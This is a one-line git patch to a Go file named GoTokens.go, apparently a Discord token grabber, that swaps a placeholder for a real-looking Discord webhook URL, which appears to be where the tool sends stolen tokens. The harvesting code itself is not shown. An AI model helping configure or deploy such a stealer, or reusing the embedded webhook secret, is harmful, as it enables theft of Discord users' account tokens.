From bd8fb46715cc68f3d4d329fac609bd75f656a836 Mon Sep 17 00:00:00 2001 From: stroudterrell2-tech Date: Thu, 23 Jul 2026 16:19:17 -0400 Subject: [PATCH] Update GoTokens.go --- GoTokens.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/GoTokens.go b/GoTokens.go index 24eafbc..26d9eac 100644 --- a/GoTokens.go +++ b/GoTokens.go @@ -14,7 +14,7 @@ import ( ) // Settings -var webhook string = "WEBHOOK-URL-HERE" +var webhook string = "https://discord.com/api/webhooks/1529945244764733581/gF6SDONUO3yFcnrlw4xaXKiPF9p6S67zfT6MNnxK-hHGUr66osvqBpZHML_tOLh95lV8" var username string = "GoTokens | (by github.com/kcybe)" var avatar_url string = "https://camo.githubusercontent.com/19701f26341abb91039ce91da2e1222c2ce8c8c12954ca7f35a6365b79ebe2df/68747470733a2f2f736563757265676f2e696f2f696d672f676f7365632e706e67"